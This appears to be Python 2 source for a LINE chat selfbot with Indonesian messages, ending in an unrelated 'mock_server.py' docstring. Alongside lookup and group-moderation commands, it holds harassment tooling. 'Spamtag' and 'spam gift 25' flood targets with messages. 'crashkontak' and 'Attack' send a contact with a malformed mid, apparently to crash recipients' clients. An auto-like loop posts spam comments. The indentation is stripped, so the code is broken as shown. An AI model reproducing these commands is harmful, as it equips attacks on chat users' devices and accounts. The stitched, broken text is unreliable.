if '&list=' not in a['href']:
hasil += ''.join((a['title'],'\nUrl : http://www.youtube.com' + a['href'],'\n\n'))
kr.sendText(msg.to,hasil)
print '[Command] Youtube Search'
elif "Lirik " in msg.text:
try:
songname = msg.text.lower().replace("Lirik ","")
params = {'songname': songname}
r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
data = r.text
data = json.loads(data)
for song in data:
hasil = 'Lyric Lagu ('
hasil += song[0]
hasil += ')\n\n'
hasil += song[5]
kr.sendText(msg.to, hasil)
except Exception as wak:
kr.sendText(msg.to, str(wak))
elif "Wikipedia " in msg.text:
try:
wiki = msg.text.lower().replace("Wikipedia ","")
wikipedia.set_lang("id")
pesan="Title ("
pesan+=wikipedia.page(wiki).title
pesan+=")\n\n"
pesan+=wikipedia.summary(wiki, sentences=1)
pesan+="\n"
pesan+=wikipedia.page(wiki).url
kr.sendText(msg.to, pesan)
except:
try:
pesan="Over Text Limit! Please Click link\n"
pesan+=wikipedia.page(wiki).url
kr.sendText(msg.to, pesan)
except Exception as e:
kr.sendText(msg.to, str(e))
elif "Music " in msg.text:
try:
songname = msg.text.lower().replace("Music ","")
params = {'songname': songname}
r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
data = r.text
data = json.loads(data)
for song in data:
hasil = 'This is Your Music\n'
hasil += 'Judul : ' + song[0]
hasil += '\nDurasi : ' + song[1]
hasil += '\nLink Download : ' + song[4]
kr.sendText(msg.to, hasil)
kr.sendText(msg.to, "Please Wait for audio...")
kr.sendAudioWithURL(msg.to, song[4])
except Exception as njer:
kr.sendText(msg.to, str(njer))
elif "Image " in msg.text:
search = msg.text.replace("Image ","")
url = 'https://www.google.com/search?espv=2&biw=1366&bih=667&tbm=isch&oq=kuc&aqs=mobile-gws-lite.0.0l5&q=' + search
raw_html = (download_page(url))
items = []
items = items + (_images_get_all_items(raw_html))
path = random.choice(items)
print path
try:
kr.sendImageWithURL(msg.to,path)
except:
pass
elif "Profileig " in msg.text:
try:
instagram = msg.text.replace("Profileig ","")
response = requests.get("https://www.instagram.com/"+instagram+"?__a=1")
data = response.json()
namaIG = str(data['user']['full_name'])
bioIG = str(data['user']['biography'])
mediaIG = str(data['user']['media']['count'])
verifIG = str(data['user']['is_verified'])
usernameIG = str(data['user']['username'])
followerIG = str(data['user']['followed_by']['count'])
profileIG = data['user']['profile_pic_url_hd']
privateIG = str(data['user']['is_private'])
followIG = str(data['user']['follows']['count'])
link = "Link: " + "https://www.instagram.com/" + instagram
text = "Name : "+namaIG+"\nUsername : "+usernameIG+"\nBiography : "+bioIG+"\nFollower : "+followerIG+"\nFollowing : "+followIG+"\nPost : "+mediaIG+"\nVerified : "+verifIG+"\nPrivate : "+privateIG+"" "\n" + link
kr.sendImageWithURL(msg.to, profileIG)
kr.sendText(msg.to, str(text))
except Exception as e:
kr.sendText(msg.to, str(e))
elif "Checkdate " in msg.text:
tanggal = msg.text.replace("Checkdate ","")
r=requests.get('https://script.google.com/macros/exec?service=AKfycbw7gKzP-WYV2F5mc9RaR7yE3Ve1yN91Tjs91hp_jHSE02dSv9w&nama=ervan&tanggal='+tanggal)
data=r.text
data=json.loads(data)
lahir = data["data"]["lahir"]
usia = data["data"]["usia"]
ultah = data["data"]["ultah"]
zodiak = data["data"]["zodiak"]
kr.sendText(msg.to,"============ I N F O R M A S I ============\n"+"Date Of Birth : "+lahir+"\nAge : "+usia+"\nUltah : "+ultah+"\nZodiak : "+zodiak+"\n============ I N F O R M A S I ============")
elif msg.text in ["Kalender","Time","Waktu"]:
timeNow = datetime.now()
timeHours = datetime.strftime(timeNow,"(%H:%M)")
day = ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday","Friday", "Saturday"]
hari = ["Minggu", "Senin", "Selasa", "Rabu", "Kamis", "Jumat", "Sabtu"]
bulan = ["Januari", "Februari", "Maret", "April", "Mei", "Juni", "Juli", "Agustus", "September", "Oktober", "November", "Desember"]
inihari = datetime.today()
hr = inihari.strftime('%A')
bln = inihari.strftime('%m')
for i in range(len(day)):
if hr == day[i]: hasil = hari[i]
for k in range(0, len(bulan)):
if bln == str(k): bln = bulan[k-1]
rst = hasil + ", " + inihari.strftime('%d') + " - " + bln + " - " + inihari.strftime('%Y') + "\nJam : [ " + inihari.strftime('%H:%M:%S') + " ]"
kr.sendText(msg.to, rst)
#==============================================================================#
elif msg.text.lower() == 'ifconfig':
botKernel = subprocess.Popen(["ifconfig"], stdout=subprocess.PIPE).communicate()[0]
kr.sendText(msg.to, botKernel + "\n\n===SERVER INFO NetStat===")
elif msg.text.lower() == 'system':
botKernel = subprocess.Popen(["df","-h"], stdout=subprocess.PIPE).communicate()[0]
kr.sendText(msg.to, botKernel + "\n\n===SERVER INFO SYSTEM===")
elif msg.text.lower() == 'kernel':
botKernel = subprocess.Popen(["uname","-srvmpio"], stdout=subprocess.PIPE).communicate()[0]
kr.sendText(msg.to, botKernel + "\n\n===SERVER INFO KERNEL===")
elif msg.text.lower() == 'cpu':
botKernel = subprocess.Popen(["cat","/proc/cpuinfo"], stdout=subprocess.PIPE).communicate()[0]
kr.sendText(msg.to, botKernel + "\n\n===SERVER INFO CPU===")
elif "Restart" in msg.text:
print "[Command]Restart"
try:
kr.sendText(msg.to,"Restarting...")
kr.sendText(msg.to,"Restart Success")
restart_program()
except:
kr.sendText(msg.to,"Please wait")
restart_program()
pass
elif "Turn off" in msg.text:
try:
import sys
sys.exit()
except:
pass
elif msg.text.lower() == 'runtime':
eltime = time.time() - mulai
van = "Bot has been active "+waktu(eltime)
kr.sendText(msg.to,van)
#================================ KRIS SCRIPT STARTED ==============================================#
elif "google " in msg.text:
a = msg.text.replace("google ","")
b = urllib.quote(a)
kr.sendText(msg.to,"Sedang Mencari om...")
kr.sendText(msg.to, "https://www.google.com/" + b)
kr.sendText(msg.to,"Ketemu om ^")
elif cms(msg.text,["/creator","Creator"]):
msg.contentType = 13
msg.contentMetadata = {'mid': "u350cc7408cc6cc82e056ee046131f925"}
kr.sendMessage(msg)
elif "friendpp: " in msg.text:
if msg.from_ in admin:
suf = msg.text.replace('friendpp: ','')
gid = kr.getAllContactIds()
for i in gid:
h = kr.getContact(i).displayName
gna = kr.getContact(i)
if h == suf:
kr.sendImageWithURL(msg.to,"http://dl.profile.line.naver.jp/"+ gna.pictureStatus)
elif "Checkmid: " in msg.text:
saya = msg.text.replace("Checkmid: ","")
msg.contentType = 13
msg.contentMetadata = {"mid":saya}
kr.sendMessage(msg)
contact = kr.getContact(saya)
cu = kr.channel.getCover(saya)
path = str(cu)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
try:
kr.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nBio :\n" + contact.statusMessage)
kr.sendText(msg.to,"Profile Picture " + contact.displayName)
kr.sendImageWithURL(msg.to,image)
kr.sendText(msg.to,"Cover " + contact.displayName)
kr.sendImageWithURL(msg.to,path)
except:
pass
elif "Checkid: " in msg.text:
saya = msg.text.replace("Checkid: ","")
gid = kr.getGroupIdsJoined()
for i in gid:
h = kr.getGroup(i).id
group = kr.getGroup(i)
if h == saya:
try:
creator = group.creator.mid
msg.contentType = 13
msg.contentMetadata = {'mid': creator}
md = "Nama Grup :\n" + group.name + "\n\nID Grup :\n" + group.id
if group.preventJoinByTicket is False: md += "\n\nKode Url : Diizinkan"
else: md += "\n\nKode Url : Diblokir"
if group.invitee is None: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : 0 Orang"
else: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : " + str(len(group.invitee)) + " Orang"
kr.sendText(msg.to,md)
kr.sendMessage(msg)
kr.sendImageWithURL(msg.to,"http://dl.profile.line.naver.jp/"+ group.pictureStatus)
except:
creator = "Error"
elif msg.text in ["Friendlist"]:
contactlist = kr.getAllContactIds()
kontak = kr.getContacts(contactlist)
num=1
msgs="═════════List Friend═════════"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.displayName)
num=(num+1)
msgs+="\n═════════List Friend═════════\n\nTotal Friend : %i" % len(kontak)
kr.sendText(msg.to, msgs)
elif msg.text in ["Member list"]:
kontak = kr.getGroup(msg.to)
group = kontak.members
num=1
msgs="═════════List Member═════════-"
for ids in group:
msgs+="\n[%i] %s" % (num, ids.displayName)
num=(num+1)
msgs+="\n═════════List Member═════════\n\nTotal Members : %i" % len(group)
kr.sendText(msg.to, msgs)
elif "Friendinfo: " in msg.text:
saya = msg.text.replace('Friendinfo: ','')
gid = kr.getAllContactIds()
for i in gid:
h = kr.getContact(i).displayName
contact = kr.getContact(i)
cu = kr.channel.getCover(i)
path = str(cu)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
if h == saya:
kr.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nBio :\n" + contact.statusMessage)
kr.sendText(msg.to,"Profile Picture " + contact.displayName)
kr.sendImageWithURL(msg.to,image)
kr.sendText(msg.to,"Cover " + contact.displayName)
kr.sendImageWithURL(msg.to,path)
elif "Friendpict: " in msg.text:
saya = msg.text.replace('Friendpict: ','')
gid = kr.getAllContactIds()
for i in gid:
h = kr.getContact(i).displayName
gna = kr.getContact(i)
if h == saya:
kr.sendImageWithURL(msg.to,"http://dl.profile.line.naver.jp/"+ gna.pictureStatus)
elif msg.text in ["Friendlistmid"]:
gruplist = kr.getAllContactIds()
kontak = kr.getContacts(gruplist)
num=1
msgs="═════════ʆίςϯ ƒɾίεηδʍίδ═════════"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.mid)
num=(num+1)
msgs+="\n═════════ʆίςϯ ƒɾίεηδʍίδ═════════\n\nTotal Friend : %i" % len(kontak)
kr.sendText(msg.to, msgs)
elif msg.text in ["Blocklist"]:
blockedlist = kr.getBlockedContactIds()
kontak = kr.getContacts(blockedlist)
num=1
msgs="═════════List Blocked═════════"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.displayName)
num=(num+1)
msgs+="\n═════════List Blocked═════════\n\nTotal Blocked : %i" % len(kontak)
kr.sendText(msg.to, msgs)
elif msg.text in ["Gruplist"]:
gruplist = kr.getGroupIdsJoined()
kontak = kr.getGroups(gruplist)
num=1
msgs="═════════List Grup═════════"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.name)
num=(num+1)
msgs+="\n═════════List Grup═════════\n\nTotal Grup : %i" % len(kontak)
kr.sendText(msg.to, msgs)
elif msg.text in ["Gruplistmid"]:
gruplist = kr.getGroupIdsJoined()
kontak = kr.getGroups(gruplist)
num=1
msgs="═════════List GrupMid═════════"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.id)
num=(num+1)
msgs+="\n═════════List GrupMid═════════\n\nTotal Grup : %i" % len(kontak)
kr.sendText(msg.to, msgs)
elif "Grupimage: " in msg.text:
saya = msg.text.replace('Grupimage: ','')
gid = kr.getGroupIdsJoined()
for i in gid:
h = kr.getGroup(i).name
gna = kr.getGroup(i)
if h == saya:
kr.sendImageWithURL(msg.to,"http://dl.profile.line.naver.jp/"+ gna.pictureStatus)
elif "Grupname" in msg.text:
saya = msg.text.replace('Grupname','')
gid = kr.getGroup(msg.to)
kr.sendText(msg.to, "[Nama Grup : ]\n" + gid.name)
elif "Grupid" in msg.text:
saya = msg.text.replace('Grupid','')
gid = kr.getGroup(msg.to)
kr.sendText(msg.to, "[ID Grup : ]\n" + gid.id)
elif "Grupinfo: " in msg.text:
saya = msg.text.replace('Grupinfo: ','')
gid = kr.getGroupIdsJoined()
for i in gid:
h = kr.getGroup(i).name
group = kr.getGroup(i)
if h == saya:
try:
creator = group.creator.mid
msg.contentType = 13
msg.contentMetadata = {'mid': creator}
md = "Nama Grup :\n" + group.name + "\n\nID Grup :\n" + group.id
if group.preventJoinByTicket is False: md += "\n\nKode Url : Diizinkan"
else: md += "\n\nKode Url : Diblokir"
if group.invitee is None: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : 0 Orang"
else: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : " + str(len(group.invitee)) + " Orang"
kr.sendText(msg.to,md)
kr.sendMessage(msg)
kr.sendImageWithURL(msg.to,"http://dl.profile.line.naver.jp/"+ group.pictureStatus)
except:
creator = "Error"
elif "Spamtag @" in msg.text:
_name = msg.text.replace("Spamtag @","")
_nametarget = _name.rstrip(' ')
gs = kr.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
xname = g.displayName
xlen = str(len(xname)+1)
msg.contentType = 0
msg.text = "@"+xname+" "
msg.contentMetadata ={'MENTION':'{"MENTIONEES":[{"S":"0","E":'+json.dumps(xlen)+',"M":'+json.dumps(g.mid)+'}]}','EMTVER':'4'}
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
print "Spamtag Berhasil."
elif "crashkontak @" in msg.text:
_name = msg.text.replace("crashkontak @","")
_nametarget = _name.rstrip(' ')
gs = kr.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
msg.contentType = 13
msg.contentMetadata = {'mid': "u350cc7408cc6cc82e056ee046131f925',"}
kr.sendMessage(g.mid,msg.to + str(msg))
kr.sendText(g.mid, "hai")
kr.sendText(g.mid, "salken")
kr.sendText(msg.to, "Done")
print " Spammed crash !"
elif "playstore " in msg.text.lower():
tob = msg.text.lower().replace("playstore ","")
kr.sendText(msg.to,"Sedang Mencari boss...")
kr.sendText(msg.to,"Title : "+tob+"\nSource : Google Play\nLinknya : https://play.google.com/store/search?q=" + tob)
kr.sendText(msg.to,"Ketemu boss ^")
elif 'wikipedia ' in msg.text.lower():
try:
wiki = msg.text.lower().replace("wikipedia ","")
wikipedia.set_lang("id")
pesan="Title ("
pesan+=wikipedia.page(wiki).title
pesan+=")\n\n"
pesan+=wikipedia.summary(wiki, sentences=3)
pesan+="\n"
pesan+=wikipedia.page(wiki).url
kr.sendText(msg.to, pesan)
except:
try:
pesan="Teks nya kepanjangan! ketik link dibawah aja\n"
pesan+=wikipedia.page(wiki).url
kr.sendText(msg.to, pesan)
except Exception as e:
kr.sendText(msg.to, str(e))
elif "say " in msg.text.lower():
say = msg.text.lower().replace("say ","")
lang = 'id'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
kr.sendAudio(msg.to,"hasil.mp3")
elif msg.text in ["spam gift 25"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'ae3d9165-fab2-4e70-859b-c14a9d4137c4',
'PRDTYPE': 'THEME',
'MSGTPL': '8'}
msg.text = None
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
elif msg.text in ["Gcreator:inv"]:
if msg.from_ in admin:
ginfo = kr.getGroup(msg.to)
gCreator = ginfo.creator.mid
try:
kr.findAndAddContactsByMid(gCreator)
kr.inviteIntoGroup(msg.to,[gCreator])
print "success inv gCreator"
except:
pass
elif msg.text in ["Gcreator:kick"]:
if msg.from_ in admin:
ginfo = kr.getGroup(msg.to)
gCreator = ginfo.creator.mid
try:
kr.findAndAddContactsByMid(gCreator)
kr.kickoutFromGroup(msg.to,[gCreator])
print "success inv gCreator"
except:
pass
elif 'lirik ' in msg.text.lower():
try:
songname = msg.text.lower().replace('lirik ','')
params = {'songname': songname}
r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
data = r.text
data = json.loads(data)
for song in data:
hasil = 'Lyric Lagu ('
hasil += song[0]
hasil += ')\n\n'
hasil += song[5]
kr.sendText(msg.to, hasil)
except Exception as wak:
kr.sendText(msg.to, str(wak))
elif "Getcover @" in msg.text:
print "[Command]dp executing"
_name = msg.text.replace("Getcover @","")
_nametarget = _name.rstrip(' ')
gs = kr.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = kr.getContact(target)
cu = kr.channel.getCover(target)
path = str(cu)
kr.sendImageWithURL(msg.to, path)
except:
pass
print "[Command]dp executed"
elif "idline: " in msg.text:
msgg = msg.text.replace('idline: ','')
conn = kr.findContactsByUserid(msgg)
if True:
msg.contentType = 13
msg.contentMetadata = {'mid': conn.mid}
kr.sendText(msg.to,"http://line.me/ti/p/~" + msgg)
kr.sendMessage(msg)
elif "reinvite" in msg.text.split():
if msg.toType == 2:
group = kr.getGroup(msg.to)
if group.invitee is not None:
try:
grCans = [contact.mid for contact in group.invitee]
kr.findAndAddContactByMid(msg.to, grCans)
kr.cancelGroupInvitation(msg.to, grCans)
kr.inviteIntoGroup(msg.to, grCans)
except Exception as error:
print error
else:
if wait["lang"] == "JP":
kr.sendText(msg.to,"No Invited")
else:
kr.sendText(msg.to,"Error")
else:
pass
elif msg.text.lower() == 'runtime':
eltime = time.time() - mulai
van = "Bot sudah berjalan selama "+waktu(eltime)
kr.sendText(msg.to,van)
elif msg.text in ["Restart"]:
kr.sendText(msg.to, "Bot has been restarted")
restart_program()
print "@Restart"
elif msg.text in ["time"]:
timeNow = datetime.now()
timeHours = datetime.strftime(timeNow,"(%H:%M)")
day = ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday","Friday", "Saturday"]
hari = ["Minggu", "Senin", "Selasa", "Rabu", "Kamis", "Jumat", "Sabtu"]
bulan = ["Januari", "Februari", "Maret", "April", "Mei", "Juni", "Juli", "Agustus", "September", "Oktober", "November", "Desember"]
inihari = datetime.today()
hr = inihari.strftime('%A')
bln = inihari.strftime('%m')
for i in range(len(day)):
if hr == day[i]: hasil = hari[i]
for k in range(0, len(bulan)):
if bln == str(k): bln = bulan[k-1]
rst = hasil + ", " + inihari.strftime('%d') + " - " + bln + " - " + inihari.strftime('%Y') + "\nJam : [ " + inihari.strftime('%H:%M:%S') + " ]"
client.sendText(msg.to, rst)
elif "image " in msg.text:
search = msg.text.replace("image ","")
url = 'https://www.google.com/search?espv=2&biw=1366&bih=667&tbm=isch&oq=kuc&aqs=mobile-gws-lite.0.0l5&q=' + search
raw_html = (download_page(url))
items = []
items = items + (_images_get_all_items(raw_html))
path = random.choice(items)
print path
try:
kr.sendImageWithURL(msg.to,path)
except:
pass
elif 'instagram ' in msg.text.lower():
try:
instagram = msg.text.lower().replace("instagram ","")
html = requests.get('https://www.instagram.com/' + instagram + '/?')
soup = BeautifulSoup(html.text, 'html5lib')
data = soup.find_all('meta', attrs={'property':'og:description'})
text = data[0].get('content').split()
data1 = soup.find_all('meta', attrs={'property':'og:image'})
text1 = data1[0].get('content').split()
user = "Name: " + text[-2] + "\n"
user1 = "Username: " + text[-1] + "\n"
followers = "Followers: " + text[0] + "\n"
following = "Following: " + text[2] + "\n"
post = "Post: " + text[4] + "\n"
link = "Link: " + "https://www.instagram.com/" + instagram
detail = "**INSTAGRAM INFO USER**\n"
details = "\n**INSTAGRAM INFO USER**"
kr.sendText(msg.to, detail + user + user1 + followers + following + post + link + details)
kr.sendImageWithURL(msg.to, text1[0])
except Exception as njer:
kr.sendText(msg.to, str(njer))
elif msg.text in ["Attack"]:
msg.contentType = 13
msg.contentMetadata = {'mid': "u350cc7408cc6cc82e056ee046131f925',"}
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
elif msg.text.lower() == '...':
msg.contentType = 13
msg.contentMetadata = {'mid': "u350cc7408cc6cc82e056ee046131f925',"}
kr.sendMessage(msg)
#=================================KRIS SCRIPT FINISHED =============================================#
elif "Ban @" in msg.text:
if msg.toType == 2:
_name = msg.text.replace("Ban @","")
_nametarget = _name.rstrip()
gs = kr.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
kr.sendText(msg.to,_nametarget + " Not Found")
else:
for target in targets:
try:
wait["blacklist"][target] = True
kr.sendText(msg.to,_nametarget + " Succes Add to Blacklist")
except:
kr.sendText(msg.to,"Error")
elif "Unban @" in msg.text:
if msg.toType == 2:
_name = msg.text.replace("Unban @","")
_nametarget = _name.rstrip()
gs = kr.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
kr.sendText(msg.to,_nametarget + " Not Found")
else:
for target in targets:
try:
del wait["blacklist"][target]
kr.sendText(msg.to,_nametarget + " Delete From Blacklist")
except:
kr.sendText(msg.to,_nametarget + " Not In Blacklist")
elif "Ban:" in msg.text:
nk0 = msg.text.replace("Ban:","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
gs = kr.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
kr.sendText(msg.to,_name + " Succes Add to Blacklist")
except:
kr.sendText(msg.to,"Error")
elif "Unban:" in msg.text:
nk0 = msg.text.replace("Unban:","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
gs = kr.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
kr.sendText(msg.to,_name + " Delete From Blacklist")
except:
kr.sendText(msg.to,_name + " Not In Blacklist")
elif msg.text in ["Clear"]:
wait["blacklist"] = {}
kr.sendText(msg.to,"Blacklist Telah Dibersihkan")
elif msg.text in ["Ban:on"]:
wait["wblacklist"] = True
kr.sendText(msg.to,"Send Contact")
elif msg.text in ["Unban:on"]:
wait["dblacklist"] = True
kr.sendText(msg.to,"Send Contact")
elif msg.text in ["Banlist"]:
if wait["blacklist"] == {}:
kr.sendText(msg.to,"Tidak Ada Blacklist")
else:
kr.sendText(msg.to,"Daftar Banlist")
num=1
msgs="*Blacklist*"
for mi_d in wait["blacklist"]:
msgs+="\n[%i] %s" % (num, kr.getContact(mi_d).displayName)
num=(num+1)
msgs+="\n*Blacklist*\n\nTotal Blacklist : %i" % len(wait["blacklist"])
kr.sendText(msg.to, msgs)
elif msg.text in ["Conban","Contactban","Contact ban"]:
if wait["blacklist"] == {}:
kr.sendText(msg.to,"Tidak Ada Blacklist")
else:
kr.sendText(msg.to,"Daftar Blacklist")
h = ""
for i in wait["blacklist"]:
h = kr.getContact(i)
M = Message()
M.to = msg.to
M.contentType = 13
M.contentMetadata = {'mid': i}
kr.sendMessage(M)
elif msg.text in ["Midban","Mid ban"]:
if msg.toType == 2:
group = kr.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
num=1
cocoa = "══════════List Blacklist═════════"
for mm in matched_list:
cocoa+="\n[%i] %s" % (num, mm)
num=(num+1)
cocoa+="\n═════════List Blacklist═════════\n\nTotal Blacklist : %i" % len(matched_list)
kr.sendText(msg.to,cocoa)
elif msg.text.lower() == 'scan blacklist':
if msg.toType == 2:
group = kr.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
kr.sendText(msg.to,"Tidak ada Daftar Blacklist")
return
for jj in matched_list:
try:
kr.kickoutFromGroup(msg.to,[jj])
print (msg.to,[jj])
except:
pass
#==============================================#
if op.type == 17:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
if wait["protect"] == True:
if wait["blacklist"][op.param2] == True:
try:
kr.kickoutFromGroup(op.param1,[op.param2])
G = kr.getGroup(op.param1)
G.preventJoinByTicket = True
kr.updateGroup(G)
except:
try:
kr.kickoutFromGroup(op.param1,[op.param2])
G = kr.getGroup(op.param1)
G.preventJoinByTicket = True
kr.updateGroup(G)
except:
pass
if op.type == 19:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["protect"] == True:
wait ["blacklist"][op.param2] = True
kr.kickoutFromGroup(op.param1,[op.param2])
kr.inviteIntoGroup(op.param1,[op.param2])
if op.type == 13:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["inviteprotect"] == True:
wait ["blacklist"][op.param2] = True
kr.kickoutFromGroup(op.param1,[op.param2])
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["inviteprotect"] == True:
wait ["blacklist"][op.param2] = True
kr.cancelGroupInvitation(op.param1,[op.param3])
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["cancelprotect"] == True:
wait ["blacklist"][op.param2] = True
kr.cancelGroupInvitation(op.param1,[op.param3])
if op.type == 11:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["linkprotect"] == True:
wait ["blacklist"][op.param2] = True
G = kr.getGroup(op.param1)
G.preventJoinByTicket = True
kr.updateGroup(G)
kr.kickoutFromGroup(op.param1,[op.param2])
if op.type == 5:
if wait["autoAdd"] == True:
if (wait["message"] in [""," ","\n",None]):
pass
else:
kr.sendText(op.param1,str(wait["message"]))
if op.type == 11:
if wait["linkprotect"] == True:
if op.param2 not in Bots:
G = kr.getGroup(op.param1)
G.preventJoinByTicket = True
kr.kickoutFromGroup(op.param1,[op.param3])
kr.updateGroup(G)
if op.type == 17:
if wait["Wc"] == True:
if op.param2 in Bots:
return
ginfo = kr.getGroup(op.param1)
kr.sendText(op.param1, "╔═════════════\n║Selamat Datang Di " + str(ginfo.name) + "\n╠═════════════\n" + "║Founder =>>> " + str(ginfo.name) + " :\n║" + ginfo.creator.displayName + "\n╠═════════════\n" + "║😊Semoga Betah Kak 😘 \n╚═════════════")
print "MEMBER HAS JOIN THE GROUP"
if op.type == 15:
if wait["Lv"] == True:
if op.param2 in Bots:
return
kr.sendText(op.param1, "╔═════════════\n║Baper Ya :v \n║Semoga Bahagia ya 😊 \n╚═════════════")
print "MEMBER HAS LEFT THE GROUP"
#------------------------------------------------------------------------------#
if op.type == 55:
try:
if op.param1 in wait2['readPoint']:
if op.param2 in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += op.param2
wait2['ROM'][op.param1][op.param2] = op.param2
with open('sider.json', 'w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
else:
pass
except:
pass
if op.type == 59:
print op
except Exception as error:
print error
def autolike():
count = 1
while True:
try:
for posts in kr.activity(1)["result"]["posts"]:
if posts["postInfo"]["liked"] is False:
if wait["likeOn"] == True:
kr.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
print "Like"
if wait["commentOn"] == True:
if posts["userInfo"]["writerMid"] in wait["commentBlack"]:
pass
else:
kr.comment(posts["userInfo"]["writerMid"],posts["postInfo"]["postId"],wait["comment"])
except:
count += 1
if(count == 50):
sys.exit(0)
else:
pass
thread2 = threading.Thread(target=autolike)
thread2.daemon = True
thread2.start()
def likefriend():
for zx in range(0,10):
hasil = kr.activity(limit=10)
if hasil['result']['posts'][zx]['postInfo']['liked'] == False:
try:
kr.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
kr.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By: ༺T-B-A༻ � 👈 »»» http://line.me/ti/p/jkp4678«««")
print "Like"
except:
pass
else:
print "Already Liked Om"
time.sleep(0.60)
def likeme():
for zx in range(0,10):
hasil = kr.activity(limit=10)
if hasil['result']['posts'][zx]['postInfo']['liked'] == False:
if hasil['result']['posts'][zx]['userInfo']['mid'] in mid:
try:
kr.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
kr.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By: ༺T-B-A༻ � 👈 »»» http://line.me/ti/pa/jkp4679«««")
print "Like"
except:
pass
else:
print "Status Sudah di Like Om"
while True:
try:
Ops = kr.fetchOps(kr.Poll.rev, 5)
except EOFError:
raise Exception("It might be wrong revision\n" + str(kr.Poll.rev))
for Op in Ops:
if (Op.type != OpType.END_OF_OPERATION):
kr.Poll.rev = max(kr.Poll.rev, Op.revision)
bot(Op)
|
mock_server.py
|
"""
The :class:`MockAsynctionSocketIO` server is essentially
an :class:`AsynctionSocketIO` server that:
